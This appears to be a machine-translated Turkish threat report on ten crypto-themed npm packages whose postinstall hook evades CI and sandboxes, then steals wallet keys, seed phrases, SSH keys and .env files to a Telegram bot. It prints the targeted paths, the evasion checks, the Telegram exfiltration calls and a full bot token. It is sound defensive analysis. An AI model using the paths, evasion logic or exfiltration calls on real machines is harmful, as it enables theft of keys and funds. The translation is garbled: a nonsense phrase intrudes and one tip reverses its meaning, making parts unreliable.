TL; DR
9 Haziran 2026'da tek bir npm yayıncı hesabı, aicrypto-xzgggsevk edildi on paket Kripto ve Web3 esintili isimlerle — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9ve altı tane daha.
Her paket aynı yükü çalıştırır. postinstall Kurulum sırasında, CI ortamında mı yoksa bir sanal ortamda mı çalıştığını kontrol eder; eğer değilse, cüzdan anahtar depolarını, kurtarma cümlesi dosyalarını, SSH anahtarlarını okur ve .env Altı farklı blockchain ekosisteminden dosyaları alıp bir Telegram botuna iletiyor.
Savunmacının hemen avlayabileceği tek gösterge Telegram bot kimliğidir. 8227918239.
Önem: kritik — İmza anahtarlarının ve kurtarma ifadelerinin doğrudan çalınması geliştirici iş istasyonları.
Saldırı: Nasıl Çalışıyor?
Bu paketler kendilerini blockchain geliştirici araçları olarak tanıtıyor. paket.json Minimal düzeydedir ve kurulum yaşam döngüsünü bir betiğe yönlendirir:
{ "name": "farming-tools-12", "main": "src/index.js", "scripts": { "postinstall": "node scripts/postinstall.js" }, "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"], "author": "Alex Smith", "license": "MIT" } komut dosyaları/kurulum sonrası.js Bu, gerçek veri yükünü yükleyen tek satırlık bir ara koddur: require(“../src/index.js”). çünkü kurulum sonrası otomatik olarak çalışır npm kurulumuGeliştirici tarafından herhangi bir kod içe aktarma işlemi gerekmez; paketi bağımlılık ağacına yerleştirmek, çalıştırılması için yeterlidir.
İçerideki öldürme zinciri src / index.js Dört adımdan oluşmaktadır:
- Çevre kontrolü. Bir koruma fonksiyonu, sunucunun bir derleme aracısı mı yoksa analiz sanal ortamı mı gibi görüneceğine karar verir.
- Gecikme. Yürütme işlemi bir işlemin arkasına ertelenir. setZaman aşımı yaklaşık 7.4 saniye.
- Toplamak. Cüzdan, anahtar ve gizli dosya yollarının sabit bir listesi taranır; mevcut dosyalar sıraya alınır.
- Sızma. Sıraya alınmış dosyalar, özet bir mesajla birlikte bir Telegram botuna gönderilir.
Hedeflenen veri toplama listesi altı zinciri ve genel geliştirici sırlarını kapsıyor. Kısaltılmış hali:
~/.config/solana/id.json ~/.ethereum/keystore ~/.solana/keypair.json ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json ./keystore.json ./mnemonic.txt ./seed.txt ./seedphrase.txt ./recovery.txt ./private.key ./.env ./.env.local Toplamda yirmi bir yol. Dizin girdileri, örneğin: ~/.ethereum/keystore Dosyalar genişletilir ve içindeki her dosya sıraya alınır. Veri sızdırma işlemi doğrudan Telegram Bot API'sini kullanır. Mesaj gönder Sunucu ve dosya özetini içeren bir çağrı, ardından bir Belge gönder Her dosya için çok parçalı yükleme:
metin
POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument (one per file) Kodun oluşturduğu özet mesaj, şu metin dizesiyle başlar: KRİPTO HIRSIZIArdından sunucu adı, kullanıcı adı, kaynak paket adı, dosya sayısı ve zaman damgası gelir.
burada yeni ne var
Ayırt edici unsur hırsızlık mekanizması değil — npm'den Telegram tabanlı veri sızdırma. kurulum sonrası hooks Çok bilinen bir yer. O, İnfaz kapısı. Herhangi bir işlem yapmadan önce, veri paketi, sunucunun bir CI çalıştırıcısına veya sanal ortama benzediğini tespit ettiğinde true değerini döndüren ve benzemediğinde erken geri dönen bir fonksiyonu çağırır:
metin
isTestEnvironment() is true when ANY of: - env CI == "true" OR GITHUB_ACTIONS == "true" OR JENKINS_HOME set - env NODE_ENV in {test, development} - username/USER contains: runner, sandbox, test, docker, jenkins, gitlab, travis, circleci - hostname contains: sandbox, test, ci - hostname matches /^[a-f0-9]{12}$/ (a container-id shape) Konteyner kimliği regex'i dikkat çekici bir maddedir: Docker, varsayılan olarak 12 onaltılık karakterden oluşan bir ana bilgisayar adını atar. konteynerBu nedenle, zararlı yazılım "ana bilgisayar adım bir Docker konteynerine benziyor" ifadesini pasif kalmak için bir neden olarak ele alıyor. Yedi saniyelik gecikmeyle birleştiğinde, tasarım geliştiricinin gerçek iş istasyonunda çalışmayı ve otomatik analiz gibi görünen her yerde sessiz kalmayı destekliyor. Bu engel, dinamik analiz sinyallerini bastırdı ve statik veri sızdırma akışını birincil kanıt olarak korudu.
Tarihçesi
| Tarih (UTC) | Etkinlikler |
|---|---|
| 2026-06-09 ~02:48 | Kümedeki ilk paketler yayınlandığında işaretlendi (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0) |
| 2026-06-09 ~03:21–03:25 | Daha yüksek sürümlü üyeler işaretlendi (ethereum-kit-9 1.25.36 şirketinde, wallet-sdk-9 (3.7.73'da) |
| 2026-06-09 ~03:58–03:59 | Son üyeler işaretlendi (defi-tools-39 4.26.29 şirketinde, swap-sdk-87 4.63.78 şirketinde, farming-tools-12 (4.68.54'da) |
| 2026-06-09 | Sınıflandırılan on tanesinin tamamı zararlı yazılım olarak sınıflandırıldı ve kayıt defterinden kaldırılması için bildirildi. |
On tanesinin tamamı yaklaşık yetmiş dakika içinde ortaya çıktı; bu, tek bir hesaptan yapılan, önceden planlanmış bir yayın akışıyla tutarlıydı.
Uzlaşma Göstergeleri
Ağ ve davranışsal göstergeler (konakçı etkisiz hale getirildi):
| Gösterge | Özellik |
|---|---|
| Veri sızdırma uç noktası | api[.]telegram[.]org (Telegram Bot API) |
| Telegram bot kimliği | 8227918239 |
| Bot belirteci | 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs |
| Telegram sohbet kimliği | 6433587894 |
| Kancayı takın | postinstall → scripts/postinstall.js → src/index.js |
| İşaretleyici dize | CRYPTO STEALER derlenmiş özet mesajda |
| Publisher | aicrypto-xzggg (belirtilen e-posta) vipsyria88@gmail[.]com(doğrulanmamış) |
Paketler ve sürümler, her birinin SHA-256 değeriyle birlikte. src / index.js Veri yükü (veri yükleri işlevsel olarak özdeştir ve yalnızca gömülü paket adı etiketinde farklılık gösterir, bu nedenle her karma değer farklıdır):
| paket | Sürümü | src/index.js dosyasının SHA-256 değeri |
|---|---|---|
farming-tools-12 | 4.68.54 | b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4 |
swap-sdk-87 | 4.63.78 | 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c |
defi-tools-39 | 4.26.29 | ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee |
wallet-sdk-9 | 3.7.73 | ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502 |
ethereum-kit-9 | 1.25.36 | c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f |
ethereum-kit-1 | 1.0.0 | 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381 |
solana-core-4 | 1.0.0 | 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d |
web3-tools-9 | 1.0.0 | db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d |
crypto-utils-7 | 1.0.0 | 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92 |
blockchain-helper-0 | 1.0.0 | 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db |
Basit bir arama sorgusu: Kurulum günlüklerinde ve kilit dosyalarında on isimden herhangi birini arayın ve Telegram Bot API'sine, normalde kullanmayan derleme veya geliştirici sunucularından gelen giden bağlantıları arayın.
Atıf ve Gözlemlenen Davranış
On paketin tamamı tek bir hesaptan yayınlandı. aicrypto-xzggg, belirtilen e-posta adresi şudur: vipsyria88@gmail[.]comHem e-posta adresi hem de kaynak kontrol bağlantısı kayıt defteri meta verilerinde doğrulanmamış olup, hesabın itibar puanı oldukça düşüktür. Hesabı kimin işlettiğini henüz teyit edemedik.
Kimlik iddiasıyla ilgili olarak iki ayrıntıyı birbirinden ayırmak gerekiyor. Birincisi, paket.json yazar alan okumaları Alex Smith her pakette yer alırken, asıl yayıncılık hesabı ise aicrypto-xzgggYazar alanı, kendi beyanıyla oluşturulmuş bir meta veridir ve yazarlığı kanıtlamaz. İkincisi, sürüm numaraları oldukça değişkendir; bazı üyeler şu kadar sürüme sahiptir: 1.0.0diğerleri 4.68.54 Bu durum, gerçek sürüm geçmişlerini korumak yerine, yeni oluşturulan paket adlarında tek bir veri paketinin yeniden kullanılmasıyla tutarlıdır.
Davranış küme genelinde aynıdır: aynı hedef yol listesi, aynı Telegram bot kimliği ve sohbet kimliği, aynı ortam kapısı, aynı KRİPTO HIRSIZI İşaretleyici. Bu tekdüzelik, paketler arasındaki en güçlü bağlantıdır. Bu bir kimlik değil, aynı operatör sinyalidir.
Savunmacılar için Etki, Trendler ve Rehberlik
Risk somut. Yazılım cüzdanı, kurtarma ifadesi dosyası veya SSH anahtarı içeren bir iş istasyonuna bu paketlerden herhangi birini kuran bir geliştirici, bu dosyaların saniyeler içinde okunup ana bilgisayardan dışarı iletilmesini sağlar. Kurtarma ifadeleri ve imzalama anahtarları, oturum belirteci gibi süresi dolmaz; bir kez... anımsatıcı.txt ya da bir Solana id.json Makineden ayrıldığında, kontrol ettiği fonlar taşınana kadar risk altında kalır. Aynı işlem ayrıca şunları da yakalar: .env API anahtarlarını ve veritabanı kimlik bilgilerini sıklıkla içeren dosyalar.
Bu kümenin arkasında iki eğilim yatıyor. Birincisi, belirli bir kitleyi - cüzdanlarını ve anahtarlarını bağımlılıkları kurdukları aynı makinede tutan geliştiricileri - hedeflemek için kripto ve Web3 temalı isimlerin sürekli kullanımı. İkincisi, kurulum zamanı yüklerinde sanal alandan kaçınmanın olgunlaşması. CI ortam değişkenlerini, çalıştırıcı kullanıcı adlarını ve Docker kapsayıcı kimliği ana bilgisayar adı şeklini kontrol eden bir geçit, gerçek bir iş istasyonundan farklı davranmak için kasıtlı bir çabadır ve tamamen dinamik tespit için çıtayı yükseltir.
Savunmacılar için:
Varsayılan olarak komut dosyaları devre dışı bırakılmış şekilde yükleyin. npm install –ignore-scriptsveya ayarla komut dosyalarını yok say=true in .npmrc, önler kurulum sonrası Yürütme; komut dosyalarını yalnızca gerçekten ihtiyaç duyan belirli bağımlılıklar için etkinleştirin.
Cüzdanları ve imzalama anahtarlarını derleme ve geliştirme makinelerinden ayrı tutun. Donanım cüzdanı veya özel, bağımlılık gerektirmeyen bir imzalama sunucusu kullanın.
Kişiselleştirilmiş ve Yenilikçi Tedavi Çözümleri .envAnahtar depoları ve kurtarma cümlesi dosyaları, adeta taç mücevherleri gibidir. Bunlar asla başka bir dosya türü olan bir dizinde bulunmamalıdır. npm kurulumu çalışan ağaç.
CI ve geliştirici sunucularından Telegram Bot API'sine giden bağlantıları arayın. Çoğu derleme ortamı bunu asla çağırmaz; ancak kurulumdan hemen sonra aniden çağıran bir ortam varsa, araştırılmaya değerdir.
Bağımlılıkları sabitleyin ve inceleyin. Genel bir kripto adına sahip yepyeni bir paket, bir kurulum sonrası Kanca ve hiçbir depo bağlantısı, kilit dosyasına girmeden önce incelenmeyi gerektirmez.
Konteyner kimliği kaçınma maddesi, analistler için de bir hatırlatma niteliğindedir: bir sanal ortamda pasif kalan kurulum zamanı yükü zararsız değildir, seçicidir. Kurulum yolunun statik olarak incelenmesi, dinamik yürütmenin göstermeyi reddedebileceği şeyleri görmenin güvenilir yoludur.
Referanslar
npm install dokümantasyonu — yaşam döngüsü komut dosyaları ve - Komut dosyalarını yoksay— otomatik yüklemeyi devre dışı bırakmaya ilişkin referans hooks.





